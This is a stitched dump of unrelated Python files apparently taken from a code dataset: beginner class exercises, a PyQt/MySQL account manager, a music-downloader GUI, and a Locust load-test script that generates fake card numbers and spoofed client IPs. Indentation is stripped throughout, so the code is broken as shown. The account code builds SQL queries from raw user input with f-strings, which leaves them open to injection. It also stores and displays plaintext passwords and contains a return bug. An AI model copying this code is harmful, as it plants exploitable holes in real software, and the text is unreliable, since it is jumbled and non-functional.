"""[função para alterar a saúde do bichinho]
Returns:
[str]: [Retorna a porcentagem da saúde do bichinho]
"""
self.saude = abs(int(input(f"Qual a nova porcentagem de saude de {self.nome}? ")))
print (f"A saúde de {self.nome} está em {self.saude}%")
bichinho.novo_humor()
return (f"A saúde de {self.nome} está em {self.saude}%")
def alterar_idade(self):
"""[Função para alterar a idade do bichinho]
Returns:
[str]: [Idade do bichinho]
"""
self.idade = abs(int(input(f"Qual a nova idade de {self.nome}? ")))
print (f"A idade de {self.nome} é {self.idade} anos")
bichinho.novo_humor()
return (f"A idade de {self.nome} é {self.idade} anos")
def novo_humor(self):
"""
[Serve para calcular o humor do bichinho, baseado na sua fome e saúde]
"""
if self.fome > 75 or self.saude < 25 or self.brincarr < 2:
self.humor = print(f'{self.nome} está Irritado')
elif self.fome > 50 or self.saude < 50 or self.brincarr < 5:
self.humor = print(f'{self.nome} está Triste')
elif self.fome > 25 or self.saude < 75 or self.brincarr < 10:
self.humor = print(f'{self.nome} está Feliz')
else:
self.humor = print(f'{self.nome} está Muito feliz')
def brincar(self):
"""[Serve para informar quanto tempo você deseja brincar com o bichinho]
"""
tempo = abs(float(input(f"Por quanto minutos deseja brincar com {self.nome}? ")))
self.brincarr = tempo
return self.brincarr
class bichinho2(bichinho):
pass
class bichinho3(bichinho):
pass
Midas = bichinho("Midas")
Miriel = bichinho2("Miriel")
Asriel = bichinho3("Asriel")
Midas.status()
Miriel.status()
Asriel.status()
```
#### File: Meus-Estudos-Python/Exercicios Classes e Objetos/classe_funcionario_update.py
```python
class funcionario:
def __init__(self, nome, salario = 1000.00):
"""[init]
Args:
nome ([str]): [Nome do funcionario]
salario (float, optional): [salario do funcionario]. Defaults to 1000.00.
"""
self.nome = nome
self.salario = salario
def nome_funcionario(self):
"""[escreve f"O nome do funcionario é {self.nome}", retorna self.nome]
"""
print(f"O nome do funcionario é {self.nome}")
return(self.nome)
def salario_funcionario(self):
"""[escreve f"O salario do funcionario é {self.salario} reais", retorna self.salario]
"""
print(f"O salario do funcionario é {self.salario} reais")
return(self.salario)
def aumentar_salario(self, aumento = 10):
"""[função para aumentar o salario do funcionario]
Args:
aumento (int, optional): [Porcentagem de aumento que sera adicionada ao salario]. Defaults to 10.
"""
self.salario += (self.salario / 100) * aumento
print(f"O salario de {self.nome} é {self.salario} reais")
return(self.salario)
fun = funcionario('Apolo')
fun.nome_funcionario()
fun.salario_funcionario()
fun.aumentar_salario()
```
#### File: Bhaskara/source/delt.py
```python
def delt(a,b,c):
dell = (b**2) - (4*a*c)
return dell
```
#### File: Projetos/Cripitografador/main.py
```python
from source import interface
import os
def main():
clear()
tela = interface.TelaPython()
tela.Iniciar()
clear()
def clear():
os.system('clear')
if __name__ == '__main__':
main()
```
#### File: Projetos/CRUD/main.py
```python
from PyQt5 import uic, QtWidgets, QtCore
from pathlib import Path
from os.path import join
from source import login_account, create_account, read_accounts
class window():
def __init__(self):
self.app = QtWidgets.QApplication([])
# Forms
self.login = self.load_ui('login.ui')
self.create = self.load_ui('create_account.ui')
self.read = self.load_ui('read_accounts.ui')
# Buttons
# Login
self.login.createAccountButton.clicked.connect(self.show_create_account)
self.login.loginAccountButton.clicked.connect(self.login_account)
# Create
self.create.createAccountButton.clicked.connect(self.create_account)
# List
self.read.saveButton.clicked.connect(self.save_user)
self.read.deleteButton.clicked.connect(self.delete_user)
# Menu
self.read.actionLogin.triggered.connect(self.show_login)
self.create.actionLogin.triggered.connect(self.show_login)
# Exec
self.login.show()
self.app.exec()
def load_ui(self, ui_file):
"""Loads the desired interface, every interface is a .ui file
Args:
ui_file ([ui]): [.ui file name]
Returns:
[ui]: [Interface loaded]
"""
path = join(Path().absolute(), 'interfaces/')
return uic.loadUi(f'{path}{ui_file}')
def show_create_account(self): self.create.show(), self.login.close()
def show_login(self): self.login.show(), self.create.close(), self.read.close() # Show login and close create, read
def login_account(self):
"""Enter the account using the username and password, if valid it will run the list_accounts function, otherwise it will return an error dialog box.
"""
self.name = str(self.login.nameInput.text()).strip()
self.password = str(self.login.passInput.text()).strip()
log = login_account.Login()
user = log.login_account(self.name, self.password)
# Valid user
if (type(user)) != tuple:
QtWidgets.QMessageBox.about(self.login, "Alerta!", "Nome de usuario ou senha invalidos!\nInsira um nome de usuario ou senha validos e tente novamente.")
else:
self.list_accounts()
def create_account(self):
"""Create a new account.
"""
name = str(self.create.nameInput.text()).lower().strip()
password = self.create.passInput.text()
con = create_account.createAccount()
user = con.create_account(name, password)
# Valid user
if user:
QtWidgets.QMessageBox.about(self.create, "Alerta!", "Conta criada com sucesso!")
self.login.show()
self.create.close()
else :
QtWidgets.QMessageBox.about(self.create, "Alerta!", "Conta já existente!\nInsira um nome de usuario diferente e tente novamente.")
def list_accounts(self):
"""Lists the accounts already created and puts the username and password in their respective lists.
"""
# Clear the lists
self.read.listNames.clear()
self.read.listPassword.clear()
self.read.show()
self.login.close()
# Database connection
con = read_accounts.read_accounts()
# Original accounts
self.original_accounts = con.list_accounts()
# Insert the username and password in their respective lists
for account in self.original_accounts:
self.read.listNames.addItem(account[0])
self.read.listPassword.addItem(account[1])
# Allows the username and password to be changed.
for index in range(self.read.listNames.count()):
item = self.read.listNames.item(index)
item.setFlags(item.flags() | QtCore.Qt.ItemIsEditable)
for index in range(self.read.listPassword.count()):
item = self.read.listPassword.item(index)
item.setFlags(item.flags() | QtCore.Qt.ItemIsEditable)
def save_user(self):
"""Saves changes made to lists.
"""
new_names, new_passwords = [], []
# Add new usernames and passwords to the lists.
for index in range(self.read.listNames.count()): new_names.append(str(self.read.listNames.item(index).text()).lower().strip())
for index in range(self.read.listPassword.count()): new_passwords.append(str(self.read.listPassword.item(index).text()).lower().strip())
account_names = self.original_accounts
for itens in range(len(new_names)) :
# Check if the username is different from the original name.
if account_names[itens][0] != new_names[itens] :
con = read_accounts.read_accounts()
user = con.update_user_name(account_names[itens][0], new_names[itens])
# Save the new information in the variable original_accounts
self.original_accounts = con.list_accounts()
if not user:
QtWidgets.QMessageBox.about(self.read, "Alerta!", "Nome de usuario já existente!\nInsira um nome de usuario diferente e tente novamente.")
else :
QtWidgets.QMessageBox.about(self.read, "Alerta!", "Nome de usuario alterado com sucesso!")
for itens in range(len(new_passwords)) :
# Check if the password is different from the original.
if account_names[itens][1] != new_passwords[itens] :
username = self.read.listNames.item(itens).text()
con = read_accounts.read_accounts()
user = con.update_user_password(username, new_passwords[itens])
# Save the new information in the variable original_accounts
self.original_accounts = con.list_accounts()
QtWidgets.QMessageBox.about(self.read, "Alerta!", "Senha alterada com sucesso!")
def delete_user(self):
"""Deletes an account."""
# Salva as alterações nos nomes de usuarios.
self.save_user()
row = self.read.listNames.currentRow()
username = self.read.listNames.item(row).text()
password = self.read.listPassword.item(row).text()
self.read.listNames.takeItem(row)
self.read.listPassword.takeItem(row)
acc = read_accounts.read_accounts()
# Delete the account in database.
acc.delete_user(username, password)
QtWidgets.QMessageBox.about(self.read, "Alerta!", "Usuario deletado com sucesso!")
# Save the new information in the variable original_accounts
self.original_accounts = acc.list_accounts()
if __name__ == '__main__':
window()
```
#### File: CRUD/source/create_account.py
```python
import mysql.connector
from mysql.connector import connection
from . import sql_essential
class createAccount(sql_essential.sql_essential):
def __init__(self):
super().__init__()
self.connection = self.create_connection()
def create_account(self, name, password):
"""[Create a new account]
Args:
name ([str]): [User name]
password ([str]): [Password]
Returns:
[bool]: [True if account was created, False if not]
"""
if self.verfiy_if_account_exists(name):
return False
else :
cursor = self.connection.cursor()
sql = f"INSERT INTO TEST (NAME, PASS) VALUES ('{name}', '{password}')"
cursor.execute(sql)
cursor.close()
self.connection.commit()
return True
def verfiy_if_account_exists(self, name):
"""[Check if the account already exists]
Args:
name ([str]): [User name]
Returns:
[bool]: [True if account exists, False if not]
"""
cursor = self.connection.cursor()
sql = f"SELECT NAME FROM TEST WHERE NAME = '{name}'"
cursor.execute(sql)
row = cursor.fetchone()
if type(row) == tuple: return True
else: True
```
#### File: Download-music-youtube/source/interface.py
```python
import PySimpleGUI as sg
from . import download
class Interface():
def __init__(self) -> None:
layout = [
[sg.Text('Link da Música ou playlist', key='playlist')],
[sg.Input(key = 'link', size=(80, 20))],
[sg.Button('Baixar Música')],
[sg.Output(size = (80, 5), key='output')]
]
self.janela = sg.Window('MUSIC-DOWNLOAD').layout(layout)
def start(self):
while True:
try:
self.event, self.values = self.janela.Read()
self.clear('output')
self.link = self.values['link']
if self.event == 'Baixar Música':
download.DownloadVerfiy(self.link)
except Exception:
print(f"Algo deu errado, portanto o download não pode ser concluido, por favor tente inserir uma nova url!\n {Exception}")
if self.event == sg.WIN_CLOSED:
break
def clear(self, key):
self.janela.FindElement(key).Update('')
def write(self, key, text):
self.janela.FindElement(key).Update(text)
``` |
{
"source": "joaoemilio/microservices-demo",
"score": 3
} |
#### File: docker/loadgenerator/locustfile.py
```python
import json
from locust import HttpLocust, TaskSet
from faker import Faker
import random
from random import randint
def generate_card(type=None):
"""
Prefill some values based on the card type
"""
card_types = ["visa", "mastercard", "discover"]
def prefill(t):
# typical number of digits in credit card
def_length = 16
"""
Prefill with initial numbers and return it including the total number of digits
remaining to fill
"""
if t == card_types[0]:
return [4], def_length - 1
elif t == card_types[1]:
# master card start with 5 and is 16 digits long
return [5, randint(1, 5)], def_length - 2
else:
# this section probably not even needed here
return [], def_length
def finalize(nums):
"""
Make the current generated list pass the Luhn check by checking and adding
the last digit appropriately bia calculating the check sum
"""
check_sum = 0
# is_even = True if (len(nums) + 1 % 2) == 0 else False
"""
Reason for this check offset is to figure out whther the final list is going
to be even or odd which will affect calculating the check_sum.
This is mainly also to avoid reversing the list back and forth which is specified
on the Luhn algorithm.
"""
check_offset = (len(nums) + 1) % 2
for i, n in enumerate(nums):
if (i + check_offset) % 2 == 0:
n_ = n * 2
check_sum += n_ - 9 if n_ > 9 else n_
else:
check_sum += n
return nums + [10 - (check_sum % 10)]
# main body
if type:
t = type.lower()
else:
t = random.choice(card_types)
if t not in card_types:
print
"Unknown type: '%s'" % type
print
"Please pick one of these supported types: %s" % card_types
return
initial, rem = prefill(t)
so_far = initial + [randint(1, 9) for x in range(rem - 1)]
card = "".join(map(str, finalize(so_far)))
return '-'.join(card[i:i + 4] for i in range(0, len(card), 4))[0:19]
fake = Faker()
class UserBehavior(TaskSet):
headers = {}
def on_start(self):
self.index()
products = [
'0PUK6V6EV0',
'1YMWWN1N4O',
'2ZYFJ3GM2N',
'66VCHSJNUP',
'6E92ZMYYFZ',
'9SIQT8TOJO',
'L9ECAV7KIM',
'LS4PSXUNUM',
'OLJCESPC7Z']
def index(self):
self.headers = {
"X-Forwarded-For": fake.ipv4_public(),
"User-Agent": fake.user_agent(),
}
self.client.get("/", headers=self.headers)
def setCurrency(self):
currencies = ['EUR', 'USD', 'JPY', 'CAD']
self.client.post("/setCurrency",
{'currency_code': random.choice(currencies)}, headers=self.headers)
def browseProduct(self):
self.client.get("/product/" + random.choice(self.products), headers=self.headers)
def viewCart(self):
self.client.get("/cart", headers=self.headers)
def addToCart(self):
product = random.choice(self.products)
self.client.get("/product/" + product, headers=self.headers)
self.client.post("/cart", {
'product_id': product,
'quantity': random.choice([1, 2, 3, 4, 5, 10])}, headers=self.headers)
def checkout(self):
self.addToCart()
body = {
'email': fake.email(),
'street_address': fake.street_address(),
'zip_code': fake.postalcode(),
'city': fake.city(),
'state': fake.state(),
'country': fake.country(),
'credit_card_number': generate_card(type=random.choice(["visa", "mastercard"])),
'credit_card_expiration_month': fake.credit_card_expire(start="now", end="+10y", date_format="%m"),
'credit_card_expiration_year': fake.credit_card_expire(start="now", end="+10y", date_format="%Y"),
'credit_card_cvv': fake.credit_card_security_code(),
}
self.client.post("/cart/checkout", body, headers=self.headers)
tasks = {
index: 1,
setCurrency: 1,
browseProduct: 10,
addToCart: 1,
viewCart: 3,
checkout: 1}
class WebsiteUser(HttpLocust):
task_set = UserBehavior
min_wait = 500
max_wait = 10000
``` |
{
"source": "joaoesantos/ise_learning",
"score": 3
} |
#### File: modules/models/execution_result.py
```python
class ExecutionResult:
def __init__(self, rawResult, wasError, executionTime):
self.rawResult = rawResult
self.wasError = wasError
self.executionTime = executionTime
@property
def rawResult(self):
return self.__rawResult
@rawResult.setter
def rawResult(self, rawResult):
if rawResult is None:
raise TypeError("Value code must be provided.")
self.__rawResult = rawResult
@property
def wasError(self):
return self.__wasError
@wasError.setter
def wasError(self, wasError):
if not isinstance(wasError, bool):
raise TypeError("Value wasError must be a bool.")
self.__wasError = wasError
@property
def executionTime(self):
return self.__executionTime
@executionTime.setter
def executionTime(self, executionTime):
if not isinstance(executionTime, float):
raise TypeError("Value executionTime must be a float.")
self.__executionTime = executionTime
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.